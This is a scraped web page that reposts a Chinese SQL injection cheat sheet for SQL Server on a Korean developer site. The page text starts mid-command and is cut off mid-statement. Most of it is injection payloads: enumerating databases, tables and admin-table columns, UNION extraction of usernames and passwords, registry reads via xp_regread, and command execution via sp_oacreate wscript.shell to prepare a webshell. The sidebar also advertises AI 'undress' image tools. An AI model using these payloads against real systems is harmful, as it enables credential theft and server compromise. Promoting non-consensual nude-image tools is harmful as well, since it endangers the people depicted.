지역 사회
배우다
도구 라이브러리
AI 도구
여가
찾다
한국어
데이터 베이스 MySQL 튜토리얼 常用SQL注射语句解析(2)_MySQL

常用SQL注射语句解析(2)_MySQL

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
Jun 01, 2016 pm 01:51 PM
w

bitsCN.com

   w "默认Web站点"

  -v "e","e:/"'--

  访问属性:(配合写入一个webshell)

  declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod

  @o, 'run', NULL,' cscript.exe c:/inetpub/wwwroot/chaccess.vbs -a

  w3svc/1/ROOT/e +browse'

  爆库 特殊技巧::%5c='/' 或者把/和/ 修改%5提交

  如何得到SQLSERVER某个数据库中所有表的表名?

  --------------------------------------------------------------------------------

  用户表:

  select name from sysobjects where xtype = 'U';

  系统表:

  select name from sysobjects where xtype = 'S';

  所有表:

  select name from sysobjects where xtype = 'S' or xtype = 'U';

  --------------------------------------------------------------------------------

  and 0(select top 1 paths from newtable)--

  得到库名(从1到5都是系统的id,6以上才可以判断)

  and 1=(select name from master.dbo.sysdatabases where dbid=7)--

  and 0(select count(*) from master.dbo.sysdatabases where name>1 and

  dbid=6)

  依次提交 dbid = 7,8,9.... 得到更多的数据库名

  and 0(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一个表

  假设为 admin

  and 0(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name

  not in ('Admin')) 来得到其他的表。

  and 0(select count(*) from bbs.dbo.sysobjects where xtype='U' and

  name='admin'

  and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id

  and 0(select top 1 name from bbs.dbo.syscolumns where id=18779569)

  得到一个admin的一个字段,假设为 user_id

  and 0(select top 1 name from bbs.dbo.syscolumns where id=18779569 and

  name not in

  ('id',...)) 来暴出其他的字段

  and 01) 可以得到用户名

  依次可以得到密码。。。。。假设存在user_id username ,password 等字段

  and 0(select count(*) from master.dbo.sysdatabases where name>1 and

  dbid=6)

  and 0(select top 1 name from bbs.dbo.sysobjects where xtype='U') 得到表名

  and 0(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name

  not in('Address'))

  and 0(select count(*) from bbs.dbo.sysobjects where xtype='U' and

  name='admin' and uid>(str(id))) 判断id值

  and 0(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段

  ?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin

  ?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin

  (union,access也好用)
   得到WEB路径
  ;create table [dbo].[swap] ([swappass][char](255));--

  and (select top 1 swappass from swap)=1--

  ;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare

  @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',

  @key='SYSTEM/CurrentControlSet/Services/W3SVC/Parameters/Virtual Roots/',

  @value_name='/', values=@test OUTPUT insert into p

 

bitsCN.com
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

더보기

인기 기사

R.E.P.O. 에너지 결정과 그들이하는 일 (노란색 크리스탈)
2 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
스플릿 소설을이기는 데 얼마나 걸립니까?
1 몇 달 전 By DDD
R.E.P.O. 최고의 그래픽 설정
2 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
어 ass 신 크리드 그림자 : 조개 수수께끼 솔루션
1 몇 주 전 By DDD
R.E.P.O. 아무도들을 수없는 경우 오디오를 수정하는 방법
2 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
더보기

뜨거운 도구

메모장++7.3.1

메모장++7.3.1

사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기

스튜디오 13.0.1 보내기

강력한 PHP 통합 개발 환경

드림위버 CS6

드림위버 CS6

시각적 웹 개발 도구

SublimeText3 Mac 버전

SublimeText3 Mac 버전

신 수준의 코드 편집 소프트웨어(SublimeText3)

더보기

뜨거운 주제

Gmail 이메일의 로그인 입구는 어디에 있나요?
7411
15
Cakephp 튜토리얼
1358
52
Steam의 계정 이름 형식은 무엇입니까?
76
11
Win11 활성화 키 영구
17
19
더보기
Related knowledge
Alter Table 문을 사용하여 MySQL에서 테이블을 어떻게 변경합니까? Alter Table 문을 사용하여 MySQL에서 테이블을 어떻게 변경합니까? Mar 19, 2025 pm 03:51 PM

이 기사는 MySQL의 Alter Table 문을 사용하여 열 추가/드롭 테이블/열 변경 및 열 데이터 유형 변경을 포함하여 테이블을 수정하는 것에 대해 설명합니다.

MySQL 연결에 대한 SSL/TLS 암호화를 어떻게 구성합니까? MySQL 연결에 대한 SSL/TLS 암호화를 어떻게 구성합니까? Mar 18, 2025 pm 12:01 PM

기사는 인증서 생성 및 확인을 포함하여 MySQL에 대한 SSL/TLS 암호화 구성에 대해 설명합니다. 주요 문제는 자체 서명 인증서의 보안 영향을 사용하는 것입니다. [문자 수 : 159]

MySQL에서 큰 데이터 세트를 어떻게 처리합니까? MySQL에서 큰 데이터 세트를 어떻게 처리합니까? Mar 21, 2025 pm 12:15 PM

기사는 MySQL에서 파티셔닝, 샤딩, 인덱싱 및 쿼리 최적화를 포함하여 대규모 데이터 세트를 처리하기위한 전략에 대해 설명합니다.

인기있는 MySQL GUI 도구는 무엇입니까 (예 : MySQL Workbench, Phpmyadmin)? 인기있는 MySQL GUI 도구는 무엇입니까 (예 : MySQL Workbench, Phpmyadmin)? Mar 21, 2025 pm 06:28 PM

기사는 MySQL Workbench 및 Phpmyadmin과 같은 인기있는 MySQL GUI 도구에 대해 논의하여 초보자 및 고급 사용자를위한 기능과 적합성을 비교합니다. [159 자].

드롭 테이블 문을 사용하여 MySQL에서 테이블을 어떻게 드롭합니까? 드롭 테이블 문을 사용하여 MySQL에서 테이블을 어떻게 드롭합니까? Mar 19, 2025 pm 03:52 PM

이 기사에서는 Drop Table 문을 사용하여 MySQL에서 테이블을 떨어 뜨리는 것에 대해 설명하여 예방 조치와 위험을 강조합니다. 백업 없이는 행동이 돌이킬 수 없으며 복구 방법 및 잠재적 생산 환경 위험을 상세하게합니다.

외국 키를 사용하여 관계를 어떻게 표현합니까? 외국 키를 사용하여 관계를 어떻게 표현합니까? Mar 19, 2025 pm 03:48 PM

기사는 외국 열쇠를 사용하여 데이터베이스의 관계를 나타내고 모범 사례, 데이터 무결성 및 피할 수있는 일반적인 함정에 중점을 둡니다.

JSON 열에서 인덱스를 어떻게 생성합니까? JSON 열에서 인덱스를 어떻게 생성합니까? Mar 21, 2025 pm 12:13 PM

이 기사에서는 PostgreSQL, MySQL 및 MongoDB와 같은 다양한 데이터베이스에서 JSON 열에서 인덱스를 작성하여 쿼리 성능을 향상시킵니다. 특정 JSON 경로를 인덱싱하는 구문 및 이점을 설명하고 지원되는 데이터베이스 시스템을 나열합니다.

일반적인 취약점 (SQL 주입, 무차별 적 공격)에 대해 MySQL을 어떻게 보호합니까? 일반적인 취약점 (SQL 주입, 무차별 적 공격)에 대해 MySQL을 어떻게 보호합니까? Mar 18, 2025 pm 12:00 PM

기사는 준비된 명령문, 입력 검증 및 강력한 암호 정책을 사용하여 SQL 주입 및 무차별 적 공격에 대한 MySQL 보안에 대해 논의합니다 (159 자)

See all articles